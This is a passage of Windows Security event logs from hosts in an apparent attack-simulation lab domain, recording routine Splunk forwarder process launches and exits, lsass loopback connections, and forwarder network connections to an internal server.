04/19/2021 06:26:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278743
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53886
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:26:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=886988
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1247
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:26:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=886987
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1247
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:26:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=886990
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1264
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Exit Status: 0x1
04/19/2021 06:26:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=886989
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1264
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=886992
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0xa58
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Exit Status: 0x1
04/19/2021 06:26:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=886991
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa58
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278744
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53887
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:26:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=886994
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1024
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Exit Status: 0x1
04/19/2021 06:26:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=886993
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1024
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=886998
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4148
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\bin\splunkd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1249
Destination Address: 10.0.1.12
Destination Port: 8089
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:26:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=886997
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4148
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\bin\splunkd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1249
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:26:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=886996
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1248
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:26:49 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=886995
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1248
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:26:50 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887000
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x584
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:26:50 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=886999
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x584
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887011
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49724
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:26:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887010
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49724
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:26:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887009
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49724
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:26:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887008
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49724
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:26:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887006
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49724
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:26:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887005
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49724
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:26:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887004
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49724
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:26:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887003
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Outbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 49724
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:26:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887002
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x468
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Exit Status: 0x1
04/19/2021 06:26:51 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887001
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x468
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887013
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x164c
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Exit Status: 0x1
04/19/2021 06:26:52 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887012
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x164c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:53 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887014
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1708
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278747
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1264
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Exit Status: 0x1
04/19/2021 06:26:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278746
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1264
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe84
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:26:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278745
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53888
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:26:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887017
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1250
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:26:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887016
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1250
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:26:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887015
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1708
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Exit Status: 0x1
04/19/2021 06:26:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278749
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x12b0
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Exit Status: 0x1
04/19/2021 06:26:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278748
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
